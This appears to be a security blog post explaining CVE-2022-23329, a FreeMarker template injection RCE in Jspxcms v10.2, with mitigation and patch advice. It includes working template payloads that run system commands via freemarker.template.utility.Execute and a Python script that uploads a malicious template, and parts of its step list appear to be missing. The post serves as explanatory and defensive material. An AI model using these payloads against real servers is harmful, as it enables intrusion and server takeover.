CVE-2022-23329 - Remote Command Execution via freemarker.template.utility.Execute in UJCMS Jspxcms v10.2.

In the world of content management systems, security vulnerabilities can spell disaster for businesses and individuals alike. One such critical vulnerability is CVE-2022-23329, affecting UJCMS also known as Jspxcms version 10.2.. This exploit takes advantage of a misconfiguration in FreeMarker's template engine, specifically the unsafe use of ${"freemarker.template.utility.Execute"?new()}. Attackers can exploit this to upload and execute arbitrary commands on the server, potentially leading to a full system compromise.

In this post, we'll break down what went wrong, how the exploit works (with code snippets), and most importantly, how to protect yourself.


## What is Jspxcms/UJCMS?

Jspxcms (UJCMS) is a popular, open-source Java-based content management system. It's widely used in enterprise environments for building websites and portals. Version 10.2. shipped with a serious misconfiguration involving FreeMarker templates.

FreeMarker and Execute Utility

FreeMarker is a template engine often embedded in Java web apps. For security, it restricts access to certain classes and methods. But in Jspxcms v10.2., templates can directly access Java classes and even instantiate them, especially       freemarker.template.utility.Execute. This class provides a way to run system commands from inside the template engine.

Here’s the problematic template code

${"freemarker.template.utility.Execute"?new()("id")}

This line, when rendered, runs the system command id and prints its output!

How Attackers Leverage File Upload

Jspxcms allows users to upload files, including FreeMarker templates (.ftl files). If user-uploaded files are not properly validated, attackers can upload a malicious .ftl file with the above code, then force the app to render the template and execute arbitrary commands.

Here's what such a malicious template looks like

<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("whoami")}

When rendered by the app, this prints the username under which the server process is running.

Original References

- NIST NVD Entry for CVE-2022-23329
- Exploit Database #50739 (Jspxcms RCE)
- FreeMarker Official Documentation: Built-in execute

Checking Vulnerability:

Visit any Jspxcms file upload or theme/template area that allows users to upload or edit .ftl files.

Trigger Render:

Visit or otherwise force the server to render the template. This could be through a preview function or by accessing a page that loads the template.

Result:

The server executes the commands inside the double quotes (id; uname -a), sending the output back to the attacker as part of the page render.

A Python exploit can look like

import requests

url = 'http://target.com/upload_template';
files = {'file': open('exploit.ftl', 'rb')}
session = requests.Session()
r = session.post(url, files=files, verify=False)
print('Template uploaded:', r.status_code)

# Now trigger the template render in your browser or via code if accessible

*Note: Paths and upload forms may vary based on Jspxcms customization.*

Run arbitrary system shell commands (RCE)

- Download/upload more malware (web shells)

If you use Jspxcms v10.2.

- Upgrade Immediately: Update to the latest secure version where this template execution is disabled or restricted.
- Restrict Templates: Never allow untrusted users to upload or edit templates with dynamic scripting capabilities.
- Sandbox FreeMarker: Ensure FreeMarker is configured with a restricted sandbox, disabling or removing access to utility classes like freemarker.template.utility.Execute.

Patch Example (for developers)

// When configuring FreeMarker
Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
// Remove access to dangerous classes
cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);

Conclusion

CVE-2022-23329 underscores the danger of mixing template engines with unrestricted code execution, especially when combined with untrusted file upload. If you use Jspxcms or similar systems, patch now, audit your user permissions, and tighten your template engine!

Stay safe, keep up with security advisories, and always review what kind of files your users can upload and execute.

References

- NVD: CVE-2022-23329
- Exploit-DB
- Official FreeMarker Docs

*If you found this helpful, share to protect others in your network!*

Timeline

Published on: 02/04/2022 22:15:00 UTC
Last modified on: 02/09/2022 02:43:00 UTC